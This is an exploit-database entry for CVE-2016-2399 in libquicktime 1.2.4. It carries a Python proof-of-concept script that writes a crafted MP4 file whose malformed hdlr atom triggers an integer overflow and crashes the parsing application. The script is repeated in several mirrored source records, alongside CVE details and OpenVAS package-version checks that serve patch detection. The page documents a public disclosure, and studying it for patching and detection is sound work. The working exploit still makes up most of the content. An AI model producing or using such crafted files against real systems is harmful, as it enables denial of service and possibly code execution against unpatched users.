Search...

libquicktime 1.2.4 - Integer Overflow

2016-02-23T00:00:00

ID EXPLOITPACK:AEC709AE31509661B7175A6940E4603D
Type exploitpack
Reporter Marco Romano
Modified 2016-02-23T00:00:00

Description

libquicktime 1.2.4 - Integer Overflow

                                        
                                            #!/usr/bin/env python
#
###
# - 7 February 2016 -
# My last bug hunting session (*for fun and no-profit*) 
# has been dedicated to libquicktime
###
# 
# Author: Marco Romano - @nemux_ http://www.nemux.org
# libquicktime 1.2.4 Integer Overflow
#
# Product Page: http://libquicktime.sourceforge.net/
# Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow
# Affected products: All products using libquicktime version &lt;= 1.2.4
#
# CVE-ID: CVE-2016-2399 
#
# Disclosure part: http://www.nemux.org
#
########
####### Timeline
#
# 07 Feb 2016 Bug discovered
# 17 Feb 2016 Mitre.org contacted
# 17 Feb 2016 Disclosed to the project's maintainer
# 23 Feb 2016 No response from the maintainer
# 23 Feb 2016 Publicly disclosed 
#
########
####### References
#
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399
# http://libquicktime.sourceforge.net/
# http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html 
# https://en.wikipedia.org/wiki/QuickTime\_File\_Format
#
#######
#
# DISCLAIMER: It's just a PoC... it will crash something
#
#### 
import sys
import struct
import binascii

"""
There needs to be an mp4 file with these nested atoms to trigger the bug:
moov -&gt; trak -&gt; mdia -&gt; hdlr
"""
hax0r_mp4 = ("0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1" 
             "6D6F6F76"               #### moov atom
             "0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000"
             "000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000" 
             "00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175"
             "7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000"
             "0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000" 
             "00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000" 
             "000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF" 
             "616C626D000000000000FEFF0000010000000E79727263000000000000000002E4"
             "7472616B"               #### trak atom
             "0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000"
             "000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040"
             "6D646961"               #### mdia atom
             "000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000"
             "4E"                     #### hdlr atom length
             "68646C72"               #### hdlr atom
             "0000000000"
             "4141414141414141"       #### our airstrip :)
             "0000000000000000000000" 
             "EC"                     #### 236 &gt; 127 &lt;-- overflow here and a change in signedness too
             "616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010")

hax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4))

def createPoC():
    try:
        with open("./nemux.mp4","wb") as output:
            output.write(hax0r_mp4)
        print "[*] The PoC is done!"
    except Exception,e: 
        print str(e)
        print "[*] mmmm!"

def usage():
    print "\nUsage? Run it -&gt; " + sys.argv[0]
    print "this poc creates an mp4 file named nemux.mp4"
    print "--------------------------------------------"
    print "This dummy help? " + sys.argv[0] + " help\n" 
    sys.exit()

if __name__ == "__main__":
    try:
        if len(sys.argv) == 2:
            usage()
        else:
            print "\nlibquicktime &lt;= 1.2.4 Integer Overflow CVE-2016-2399\n"
            print "Author: Marco Romano - @nemux_ - http://www.nemux.org\n\n";
            createPoC();
    except Exception,e: 
        print str(e)
        print "Ok... Something went wrong..."
        sys.exit()

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:05:59", "references": [], "description": "\nlibquicktime 1.2.4 - Integer Overflow", "edition": 1, "reporter": "Marco Romano", "exploitpack": {"type": "dos", "platform": "multiple"}, "published": "2016-02-23T00:00:00", "title": "libquicktime 1.2.4 - Integer Overflow", "type": "exploitpack", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-2399"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:135899"]}, {"type": "nessus", "idList": ["SUSE_SU-2017-1986-1.NASL", "DEBIAN_DSA-3800.NASL", "SUSE_SU-2017-0610-1.NASL", "DEBIAN_DLA-844.NASL", "OPENSUSE-2017-288.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:703800", "OPENVAS:1361412562310703800", "OPENVAS:1361412562310890844"]}, {"type": "debian", "idList": ["DEBIAN:DLA-844-1:470FD", "DEBIAN:DSA-3800-1:6B4DD"]}, {"type": "zdt", "idList": ["1337DAY-ID-25845"]}, {"type": "exploitdb", "idList": ["EDB-ID:39487"]}], "modified": "2020-04-01T19:05:59", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2020-04-01T19:05:59", "rev": 2}, "vulnersScore": 6.8}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2399"], "modified": "2016-02-23T00:00:00", "id": "EXPLOITPACK:AEC709AE31509661B7175A6940E4603D", "href": "", "viewCount": 1, "sourceData": "#!/usr/bin/env python\n#\n###\n# - 7 February 2016 -\n# My last bug hunting session (*for fun and no-profit*) \n# has been dedicated to libquicktime\n###\n# \n# Author: Marco Romano - @nemux_ http://www.nemux.org\n# libquicktime 1.2.4 Integer Overflow\n#\n# Product Page: http://libquicktime.sourceforge.net/\n# Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow\n# Affected products: All products using libquicktime version <= 1.2.4\n#\n# CVE-ID: CVE-2016-2399 \n#\n# Disclosure part: http://www.nemux.org\n#\n########\n####### Timeline\n#\n# 07 Feb 2016 Bug discovered\n# 17 Feb 2016 Mitre.org contacted\n# 17 Feb 2016 Disclosed to the project's maintainer\n# 23 Feb 2016 No response from the maintainer\n# 23 Feb 2016 Publicly disclosed \n#\n########\n####### References\n#\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399\n# http://libquicktime.sourceforge.net/\n# http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html \n# https://en.wikipedia.org/wiki/QuickTime\\_File\\_Format\n#\n#######\n#\n# DISCLAIMER: It's just a PoC... it will crash something\n#\n#### \nimport sys\nimport struct\nimport binascii\n\n\"\"\"\nThere needs to be an mp4 file with these nested atoms to trigger the bug:\nmoov -> trak -> mdia -> hdlr\n\"\"\"\nhax0r_mp4 = (\"0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1\" \n \"6D6F6F76\" #### moov atom\n \"0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000\"\n \"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000\" \n \"00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175\"\n \"7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000\"\n \"0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000\" \n \"00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000\" \n \"000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF\" \n \"616C626D000000000000FEFF0000010000000E79727263000000000000000002E4\"\n \"7472616B\" #### trak atom\n \"0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000\"\n \"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040\"\n \"6D646961\" #### mdia atom\n \"000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000\"\n \"4E\" #### hdlr atom length\n \"68646C72\" #### hdlr atom\n \"0000000000\"\n \"4141414141414141\" #### our airstrip :)\n \"0000000000000000000000\" \n \"EC\" #### 236 > 127 <-- overflow here and a change in signedness too\n \"616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010\")\n\nhax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4))\n\ndef createPoC():\n try:\n with open(\"./nemux.mp4\",\"wb\") as output:\n output.write(hax0r_mp4)\n print \"[*] The PoC is done!\"\n except Exception,e: \n print str(e)\n print \"[*] mmmm!\"\n\ndef usage():\n print \"\\nUsage? Run it -> \" + sys.argv[0]\n print \"this poc creates an mp4 file named nemux.mp4\"\n print \"--------------------------------------------\"\n print \"This dummy help? \" + sys.argv[0] + \" help\\n\" \n sys.exit()\n\nif __name__ == \"__main__\":\n try:\n if len(sys.argv) == 2:\n usage()\n else:\n print \"\\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\\n\"\n print \"Author: Marco Romano - @nemux_ - http://www.nemux.org\\n\\n\";\n createPoC();\n except Exception,e: \n print str(e)\n print \"Ok... Something went wrong...\"\n sys.exit()", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}

{"cve": [{"lastseen": "2021-02-02T06:28:04", "description": "Integer overflow in the quicktime_read_pascal function in libquicktime 1.2.4 and earlier allows remote attackers to cause a denial of service or possibly have other unspecified impact via a crafted hdlr MP4 atom.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-30T22:59:00", "title": "CVE-2016-2399", "type": "cve", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2399"], "modified": "2017-11-04T01:29:00", "cpe": ["cpe:/a:libquicktime:libquicktime:1.2.4"], "id": "CVE-2016-2399", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2399", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:libquicktime:libquicktime:1.2.4:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-01-29T20:08:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2399"], "description": "Marco ", "modified": "2020-01-29T00:00:00", "published": "2018-01-12T00:00:00", "id": "OPENVAS:1361412562310890844", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310890844", "type": "openvas", "title": "Debian LTS: Security Advisory for libquicktime (DLA-844-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.890844\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2016-2399\");\n script_name(\"Debian LTS: Security Advisory for libquicktime (DLA-844-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-01-12 00:00:00 +0100 (Fri, 12 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/03/msg00000.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"libquicktime on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n2:1.2.4-3+deb7u1.\n\nWe recommend that you upgrade your libquicktime packages.\");\n\n script_tag(name:\"summary\", value:\"Marco 'nemux' Romano discovered that an integer overflow in the\nquicktime_read_pascal function in libquicktime 1.2.4 and earlier\nallows remote attackers to cause a denial of service or possibly have\nother unspecified impact via a crafted hdlr MP4 atom.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libquicktime-dev\", ver:\"2:1.2.4-3+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libquicktime-doc\", ver:\"2:1.2.4-3+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libquicktime2\", ver:\"2:1.2.4-3+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"quicktime-utils\", ver:\"2:1.2.4-3+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"quicktime-x11utils\", ver:\"2:1.2.4-3+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2399"], "description": "Marco Romano discovered that libquicktime, a library for reading and\nwriting QuickTime files, was vulnerable to an integer overflow\nattack. When opened, a specially crafted MP4 file would cause a denial\nof service by crashing the application.", "modified": "2019-03-18T00:00:00", "published": "2017-03-02T00:00:00", "id": "OPENVAS:1361412562310703800", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703800", "type": "openvas", "title": "Debian Security Advisory DSA 3800-1 (libquicktime - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3800.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3800-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703800\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2016-2399\");\n script_name(\"Debian Security Advisory DSA 3800-1 (libquicktime - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-02 00:00:00 +0100 (Thu, 02 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3800.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"libquicktime on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), this problem has been fixed in\nversion 2:1.2.4-7+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:1.2.4-10.\n\nWe recommend that you upgrade your libquicktime packages.\");\n script_tag(name:\"summary\", value:\"Marco Romano discovered that libquicktime, a library for reading and\nwriting QuickTime files, was vulnerable to an integer overflow\nattack. When opened, a specially crafted MP4 file would cause a denial\nof service by crashing the application.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libquicktime-dev\", ver:\"2:1.2.4-7+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libquicktime-doc\", ver:\"2:1.2.4-7+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libquicktime2\", ver:\"2:1.2.4-7+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"quicktime-utils\", ver:\"2:1.2.4-7+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"quicktime-x11utils\", ver:\"2:1.2.4-7+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:57:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2399"], "description": "Marco Romano discovered that libquicktime, a library for reading and\nwriting QuickTime files, was vulnerable to an integer overflow\nattack. When opened, a specially crafted MP4 file would cause a denial\nof service by crashing the application.", "modified": "2017-07-07T00:00:00", "published": "2017-03-02T00:00:00", "id": "OPENVAS:703800", "href": "http://plugins.openvas.org/nasl.php?oid=703800", "type": "openvas", "title": "Debian Security Advisory DSA 3800-1 (libquicktime - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3800.nasl 6607 2017-07-07 12:04:25Z cfischer $\n# Auto-generated from advisory DSA 3800-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703800);\n script_version(\"$Revision: 6607 $\");\n script_cve_id(\"CVE-2016-2399\");\n script_name(\"Debian Security Advisory DSA 3800-1 (libquicktime - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:04:25 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2017-03-02 00:00:00 +0100 (Thu, 02 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2017/dsa-3800.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"libquicktime on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), this problem has been fixed in\nversion 2:1.2.4-7+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:1.2.4-10.\n\nWe recommend that you upgrade your libquicktime packages.\");\n script_tag(name: \"summary\", value: \"Marco Romano discovered that libquicktime, a library for reading and\nwriting QuickTime files, was vulnerable to an integer overflow\nattack. When opened, a specially crafted MP4 file would cause a denial\nof service by crashing the application.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libquicktime-dev\", ver:\"2:1.2.4-7+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libquicktime-doc\", ver:\"2:1.2.4-7+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libquicktime2\", ver:\"2:1.2.4-7+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"quicktime-utils\", ver:\"2:1.2.4-7+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"quicktime-x11utils\", ver:\"2:1.2.4-7+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:20", "description": "", "published": "2016-02-23T00:00:00", "type": "packetstorm", "title": "libquicktime 1.2.4 Integer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2399"], "modified": "2016-02-23T00:00:00", "id": "PACKETSTORM:135899", "href": "https://packetstormsecurity.com/files/135899/libquicktime-1.2.4-Integer-Overflow.html", "sourceData": "`#!/usr/bin/env python \n# \n### \n# - 7 February 2016 - \n# My last bug hunting session (*for fun and no-profit*) \n# has been dedicated to libquicktime \n### \n# \n# Author: Marco Romano - @nemux_ http://www.nemux.org \n# libquicktime 1.2.4 Integer Overflow \n# \n# Product Page: http://libquicktime.sourceforge.net/ \n# Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow \n# Affected products: All products using libquicktime version <= 1.2.4 \n# \n# CVE-ID: CVE-2016-2399 \n# \n# Disclosure part: http://www.nemux.org \n# \n######## \n####### Timeline \n# \n# 07 Feb 2016 Bug discovered \n# 17 Feb 2016 Mitre.org contacted \n# 17 Feb 2016 Disclosed to the project's maintainer \n# 23 Feb 2016 No response from the maintainer \n# 23 Feb 2016 Publicly disclosed \n# \n######## \n####### References \n# \n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399 \n# http://libquicktime.sourceforge.net/ \n# http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html \n# https://en.wikipedia.org/wiki/QuickTime\\_File\\_Format \n# \n####### \n# \n# DISCLAIMER: It's just a PoC... it will crash something \n# \n#### \nimport sys \nimport struct \nimport binascii \n \n\"\"\" \nThere needs to be an mp4 file with these nested atoms to trigger the bug: \nmoov -> trak -> mdia -> hdlr \n\"\"\" \nhax0r_mp4 = (\"0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1\" \n\"6D6F6F76\" #### moov atom \n\"0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000\" \n\"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000\" \n\"00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175\" \n\"7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000\" \n\"0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000\" \n\"00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000\" \n\"000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF\" \n\"616C626D000000000000FEFF0000010000000E79727263000000000000000002E4\" \n\"7472616B\" #### trak atom \n\"0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000\" \n\"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040\" \n\"6D646961\" #### mdia atom \n\"000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000\" \n\"4E\" #### hdlr atom length \n\"68646C72\" #### hdlr atom \n\"0000000000\" \n\"4141414141414141\" #### our airstrip :) \n\"0000000000000000000000\" \n\"EC\" #### 236 > 127 <-- overflow here and a change in signedness too \n\"616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010\") \n \nhax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4)) \n \ndef createPoC(): \ntry: \nwith open(\"./nemux.mp4\",\"wb\") as output: \noutput.write(hax0r_mp4) \nprint \"[*] The PoC is done!\" \nexcept Exception,e: \nprint str(e) \nprint \"[*] mmmm!\" \n \ndef usage(): \nprint \"\\nUsage? Run it -> \" + sys.argv[0] \nprint \"this poc creates an mp4 file named nemux.mp4\" \nprint \"--------------------------------------------\" \nprint \"This dummy help? \" + sys.argv[0] + \" help\\n\" \nsys.exit() \n \nif __name__ == \"__main__\": \ntry: \nif len(sys.argv) == 2: \nusage() \nelse: \nprint \"\\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\\n\" \nprint \"Author: Marco Romano - @nemux_ - http://www.nemux.org\\n\\n\"; \ncreatePoC(); \nexcept Exception,e: \nprint str(e) \nprint \"Ok... Something went wrong...\" \nsys.exit() \n \n \n \n`\n", "cvss": {"score": 5.7, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:LOW/I:LOW/A:LOW/"}, "sourceHref": "https://packetstormsecurity.com/files/download/135899/libquicktime_CVE-2016-2399-PoC.py.txt"}], "exploitdb": [{"lastseen": "2016-02-24T19:47:32", "description": "libquicktime 1.2.4 - Integer Overflow. CVE-2016-2399. Dos exploits for multiple platform", "published": "2016-02-23T00:00:00", "type": "exploitdb", "title": "libquicktime 1.2.4 - Integer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2399"], "modified": "2016-02-23T00:00:00", "id": "EDB-ID:39487", "href": "https://www.exploit-db.com/exploits/39487/", "sourceData": "#!/usr/bin/env python\r\n#\r\n###\r\n# - 7 February 2016 -\r\n# My last bug hunting session (*for fun and no-profit*) \r\n# has been dedicated to libquicktime\r\n###\r\n# \r\n# Author: Marco Romano - @nemux_ http://www.nemux.org\r\n# libquicktime 1.2.4 Integer Overflow\r\n#\r\n# Product Page: http://libquicktime.sourceforge.net/\r\n# Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow\r\n# Affected products: All products using libquicktime version <= 1.2.4\r\n#\r\n# CVE-ID: CVE-2016-2399 \r\n#\r\n# Disclosure part: http://www.nemux.org\r\n#\r\n########\r\n####### Timeline\r\n#\r\n# 07 Feb 2016 Bug discovered\r\n# 17 Feb 2016 Mitre.org contacted\r\n# 17 Feb 2016 Disclosed to the project's maintainer\r\n# 23 Feb 2016 No response from the maintainer\r\n# 23 Feb 2016 Publicly disclosed \r\n#\r\n########\r\n####### References\r\n#\r\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399\r\n# http://libquicktime.sourceforge.net/\r\n# http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html \r\n# https://en.wikipedia.org/wiki/QuickTime\\_File\\_Format\r\n#\r\n#######\r\n#\r\n# DISCLAIMER: It's just a PoC... it will crash 